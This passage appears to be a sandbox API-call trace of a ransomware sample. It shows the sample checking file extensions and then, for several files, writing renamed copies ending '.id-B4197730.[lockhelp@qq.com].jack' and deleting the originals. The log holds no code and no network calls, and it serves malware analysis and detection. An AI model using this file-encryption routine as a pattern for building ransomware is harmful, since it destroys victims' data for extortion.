lpString2="n.bmp") returned -1 [0198.787] lstrlenW (lpString=".pdf") returned 4 [0198.787] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString=".xls") returned 4 [0198.787] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString=".xlsx") returned 5 [0198.787] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0198.787] lstrlenW (lpString=".ppt") returned 4 [0198.787] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.787] lstrlenW (lpString=".zip") returned 4 [0198.787] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString=".rar") returned 4 [0198.787] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString=".bz2") returned 4 [0198.787] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString=".7z") returned 3 [0198.787] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0198.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.787] lstrlenW (lpString=".dbf") returned 4 [0198.787] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.787] lstrlenW (lpString=".1cd") returned 4 [0198.787] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0198.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.787] lstrlenW (lpString=".jpg") returned 4 [0198.787] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.788] lstrlenW (lpString=".doc") returned 4 [0198.788] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString=".docx") returned 5 [0198.788] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0198.788] lstrlenW (lpString=".pdf") returned 4 [0198.788] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString=".xls") returned 4 [0198.788] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString=".xlsx") returned 5 [0198.788] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0198.788] lstrlenW (lpString=".ppt") returned 4 [0198.788] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.788] lstrlenW (lpString=".zip") returned 4 [0198.788] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString=".rar") returned 4 [0198.788] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString=".bz2") returned 4 [0198.788] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString=".7z") returned 3 [0198.788] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0198.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.788] lstrlenW (lpString=".dbf") returned 4 [0198.788] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0198.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.788] lstrlenW (lpString=".1cd") returned 4 [0198.788] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0198.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.788] lstrlenW (lpString=".jpg") returned 4 [0198.788] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0198.788] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.788] lstrlenW (lpString="Strings.xml") returned 11 [0198.789] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.789] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=14084) returned 1 [0198.789] CloseHandle (hObject=0x3dc) returned 1 [0198.789] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 0x80 [0198.789] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.789] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.789] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.789] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.789] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0198.789] GetLastError () returned 0x0 [0198.789] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x3704, lpOverlapped=0x0) returned 1 [0198.791] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x3710, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x3710, lpOverlapped=0x0) returned 1 [0198.792] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.792] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xea, lpOverlapped=0x0) returned 1 [0198.792] SetEndOfFile (hFile=0x434) returned 1 [0198.792] CloseHandle (hObject=0x434) returned 1 [0198.797] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.797] SetEndOfFile (hFile=0x3dc) returned 1 [0198.798] CloseHandle (hObject=0x3dc) returned 1 [0198.798] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.799] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 1 [0198.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.799] lstrlenW (lpString=".doc") returned 4 [0198.799] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.799] lstrlenW (lpString=".docx") returned 5 [0198.799] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0198.799] lstrlenW (lpString=".pdf") returned 4 [0198.799] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.799] lstrlenW (lpString=".xls") returned 4 [0198.799] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.799] lstrlenW (lpString=".xlsx") returned 5 [0198.799] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0198.799] lstrlenW (lpString=".ppt") returned 4 [0198.799] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.799] lstrlenW (lpString=".zip") returned 4 [0198.799] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.799] lstrlenW (lpString=".rar") returned 4 [0198.799] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.799] lstrlenW (lpString=".bz2") returned 4 [0198.800] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString=".7z") returned 3 [0198.800] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.800] lstrlenW (lpString=".dbf") returned 4 [0198.800] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.800] lstrlenW (lpString=".1cd") returned 4 [0198.800] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.800] lstrlenW (lpString=".jpg") returned 4 [0198.800] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.800] lstrlenW (lpString=".doc") returned 4 [0198.800] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString=".docx") returned 5 [0198.800] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0198.800] lstrlenW (lpString=".pdf") returned 4 [0198.800] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString=".xls") returned 4 [0198.800] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString=".xlsx") returned 5 [0198.800] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0198.800] lstrlenW (lpString=".ppt") returned 4 [0198.800] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.800] lstrlenW (lpString=".zip") returned 4 [0198.800] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.800] lstrlenW (lpString=".rar") returned 4 [0198.800] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.800] lstrlenW (lpString=".bz2") returned 4 [0198.801] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.801] lstrlenW (lpString=".7z") returned 3 [0198.801] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.801] lstrlenW (lpString=".dbf") returned 4 [0198.801] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.801] lstrlenW (lpString=".1cd") returned 4 [0198.801] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0198.801] lstrlenW (lpString=".jpg") returned 4 [0198.801] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.801] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.801] lstrlenW (lpString="UiInfo.xml") returned 10 [0198.801] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.801] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=38898) returned 1 [0198.801] CloseHandle (hObject=0x3dc) returned 1 [0198.801] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 0x80 [0198.801] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.802] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.802] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.802] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.802] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0198.802] GetLastError () returned 0x0 [0198.802] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x97f2, lpOverlapped=0x0) returned 1 [0198.804] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x9800, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x9800, lpOverlapped=0x0) returned 1 [0198.805] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.805] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xe8, lpOverlapped=0x0) returned 1 [0198.805] SetEndOfFile (hFile=0x434) returned 1 [0198.805] CloseHandle (hObject=0x434) returned 1 [0198.807] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.807] SetEndOfFile (hFile=0x3dc) returned 1 [0198.808] CloseHandle (hObject=0x3dc) returned 1 [0198.808] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.808] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 1 [0198.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.809] lstrlenW (lpString=".doc") returned 4 [0198.809] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.809] lstrlenW (lpString=".docx") returned 5 [0198.809] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.809] lstrlenW (lpString=".pdf") returned 4 [0198.809] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.809] lstrlenW (lpString=".xls") returned 4 [0198.809] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.809] lstrlenW (lpString=".xlsx") returned 5 [0198.809] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.809] lstrlenW (lpString=".ppt") returned 4 [0198.809] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.809] lstrlenW (lpString=".zip") returned 4 [0198.809] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.809] lstrlenW (lpString=".rar") returned 4 [0198.809] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.809] lstrlenW (lpString=".bz2") returned 4 [0198.809] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.809] lstrlenW (lpString=".7z") returned 3 [0198.809] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.809] lstrlenW (lpString=".dbf") returned 4 [0198.810] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.810] lstrlenW (lpString=".1cd") returned 4 [0198.810] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.810] lstrlenW (lpString=".jpg") returned 4 [0198.810] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.810] lstrlenW (lpString=".doc") returned 4 [0198.810] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString=".docx") returned 5 [0198.810] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.810] lstrlenW (lpString=".pdf") returned 4 [0198.810] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString=".xls") returned 4 [0198.810] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString=".xlsx") returned 5 [0198.810] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.810] lstrlenW (lpString=".ppt") returned 4 [0198.810] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.810] lstrlenW (lpString=".zip") returned 4 [0198.810] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.810] lstrlenW (lpString=".rar") returned 4 [0198.810] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString=".bz2") returned 4 [0198.810] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.810] lstrlenW (lpString=".7z") returned 3 [0198.810] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.811] lstrlenW (lpString=".dbf") returned 4 [0198.811] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.811] lstrlenW (lpString=".1cd") returned 4 [0198.811] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0198.811] lstrlenW (lpString=".jpg") returned 4 [0198.811] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.811] lstrcmpiW (lpString1=".bmp", lpString2=".jack") returned -1 [0198.811] lstrlenW (lpString="watermark.bmp") returned 13 [0198.811] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.811] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=104072) returned 1 [0198.811] CloseHandle (hObject=0x3dc) returned 1 [0198.812] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 0x80 [0198.812] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.812] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.812] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.812] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.812] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0198.812] GetLastError () returned 0x0 [0198.812] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x19688, lpOverlapped=0x0) returned 1 [0199.079] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x19690, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x19690, lpOverlapped=0x0) returned 1 [0199.211] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.211] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xee, lpOverlapped=0x0) returned 1 [0199.211] SetEndOfFile (hFile=0x434) returned 1 [0199.211] CloseHandle (hObject=0x434) returned 1 [0199.244] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.244] SetEndOfFile (hFile=0x3dc) returned 1 [0199.284] CloseHandle (hObject=0x3dc) returned 1 [0199.285] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.285] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 1 [0199.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.285] lstrlenW (lpString=".doc") returned 4 [0199.285] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0199.285] lstrlenW (lpString=".docx") returned 5 [0199.285] lstrcmpiW (lpString1=".docx", lpString2="k.bmp") returned -1 [0199.285] lstrlenW (lpString=".pdf") returned 4 [0199.286] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString=".xls") returned 4 [0199.286] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString=".xlsx") returned 5 [0199.286] lstrcmpiW (lpString1=".xlsx", lpString2="k.bmp") returned -1 [0199.286] lstrlenW (lpString=".ppt") returned 4 [0199.286] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.286] lstrlenW (lpString=".zip") returned 4 [0199.286] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString=".rar") returned 4 [0199.286] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString=".bz2") returned 4 [0199.286] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString=".7z") returned 3 [0199.286] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0199.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.286] lstrlenW (lpString=".dbf") returned 4 [0199.286] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.286] lstrlenW (lpString=".1cd") returned 4 [0199.286] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0199.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.286] lstrlenW (lpString=".jpg") returned 4 [0199.286] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0199.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.287] lstrlenW (lpString=".doc") returned 4 [0199.287] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString=".docx") returned 5 [0199.287] lstrcmpiW (lpString1=".docx", lpString2="k.bmp") returned -1 [0199.287] lstrlenW (lpString=".pdf") returned 4 [0199.287] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString=".xls") returned 4 [0199.287] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString=".xlsx") returned 5 [0199.287] lstrcmpiW (lpString1=".xlsx", lpString2="k.bmp") returned -1 [0199.287] lstrlenW (lpString=".ppt") returned 4 [0199.287] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.287] lstrlenW (lpString=".zip") returned 4 [0199.287] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString=".rar") returned 4 [0199.287] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString=".bz2") returned 4 [0199.287] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString=".7z") returned 3 [0199.287] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0199.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.287] lstrlenW (lpString=".dbf") returned 4 [0199.287] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0199.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.287] lstrlenW (lpString=".1cd") returned 4 [0199.287] 